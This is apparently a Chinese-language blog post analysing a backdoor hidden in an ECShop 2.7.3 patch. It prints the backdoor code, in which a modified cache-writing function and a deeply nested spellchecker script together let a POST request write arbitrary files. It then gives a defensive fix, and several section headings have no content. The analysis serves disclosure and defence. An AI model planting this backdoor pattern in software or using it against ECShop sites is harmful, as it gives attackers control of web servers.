catalog
1. 漏洞描述 2. 漏洞触发条件 3. 漏洞影响范围 4. 漏洞代码分析 5. 防御方法 6. 攻防思考
1. 漏洞描述
ECShop是国内一款流行的网店管理系统软件,其2.7.3版本某个补丁存在后门文件,攻击者利用后门可以控制网站
Relevant Link:
http://sebug.net/vuldb/ssvid-62379
2. 漏洞触发条件
3. 漏洞影响范围
4. 漏洞代码分析
/includes/lib_base.php
//隐藏了逻辑型WEBSHELL后门 function write_static_cache($cache_name,$caches,$newname,$newfile) { if (!empty($cache_name)) { if ((DEBUG_MODE & 2) == 2) { return false; } $cache_file_path = ROOT_PATH . '/temp/static_caches/' . $cache_name . '.php'; $content = "<?php\r\n"; $content .= "\$data = " . var_export($caches, true) . ";\r\n"; $content .= "?>"; file_put_contents($cache_file_path, $content, LOCK_EX); } //任意写入任意文件 else { @file_put_contents($newfile, $newname); } }
/includes/fckeditor/editor/dialog/fck_spellerpages/spellerpages/server-scripts/spellchecker.php
//黑客将攻击入口放在了一个较深的目录下,避免被管理员发现 $newname = $_POST['newname']; $newfile = $_POST['newfile']; //提交POST请求后,可以任意写入文件 write_static_cache($cache_name,$caches,$newname,$newfile);
Relevant Link:
http://webscan.360.cn/vul/view/vulid/1063 http://www.2cto.com/Article/201305/213322.html
5. 防御方法
/includes/lib_base.php
function write_static_cache($cache_name,$caches,$newname,$newfile) { if (!empty($cache_name)) { if ((DEBUG_MODE & 2) == 2) { return false; } $cache_file_path = ROOT_PATH . '/temp/static_caches/' . $cache_name . '.php'; $content = "<?php\r\n"; $content .= "\$data = " . var_export($caches, true) . ";\r\n"; $content .= "?>"; file_put_contents($cache_file_path, $content, LOCK_EX); } //任意写入任意文件 else { //@file_put_contents($newfile, $newname); die("request error!"); } }
/includes/fckeditor/editor/dialog/fck_spellerpages/spellerpages/server-scripts/spellchecker.php
//删除如下代码 $newname = $_POST['newname']; $newfile = $_POST['newfile']; write_static_cache($cache_name,$caches,$newname,$newfile);
6. 攻防思考
Copyright (c) 2015 LittleHann All rights reserved
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
